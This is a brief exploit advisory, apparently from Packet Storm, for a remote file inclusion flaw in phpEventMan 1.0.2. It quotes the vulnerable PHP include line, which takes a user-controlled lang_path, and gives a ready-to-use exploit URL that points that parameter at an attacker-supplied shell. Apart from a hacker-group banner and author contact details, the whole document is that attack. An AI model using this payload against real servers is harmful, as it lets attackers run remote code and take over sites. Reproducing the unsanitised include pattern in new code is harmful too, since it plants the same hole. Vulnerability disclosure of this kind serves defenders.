phpEventMan version 1.0.2 suffers from a remote file inclusion vulnerability.
1d57c73573b404847f9fc473199e63f00654220f57d61a9807f0f57d8d3aa846 ___. .__.__ .__ __ __
____ ___.__.\_ |__ ___________ _____ |__| | |__|/ |______ _____/ |_
_/ ___< | | | __ \_/ __ \_ __ \/ \| | | | \ __\__ \ / \ __\
\ \___\___ | | \_\ \ ___/| | \/ Y Y \ | |_| || | / __ \| | \ |
\___ > ____| |___ /\___ >__| |__|_| /__|____/__||__| (____ /___| /__|
\/\/ \/ \/ \/ \/ \/
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Author: cybermilitant
Site: www.hacktime.org
E-Mail: cybermilitant.ht@gmail.com
Vulnerability: Remote File Include
Script: phpEventMan 1.0.2
Download: http://sourceforge.net/project/showfiles.php?group_id=169887
Vulnerable code:
include($lang_path.'phpmailer.lang-en.php');
Exploit:
http://localhost/phpevent/Shared/objects/thirdparty/class.phpmailer.php?lang_path=[shell]?
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed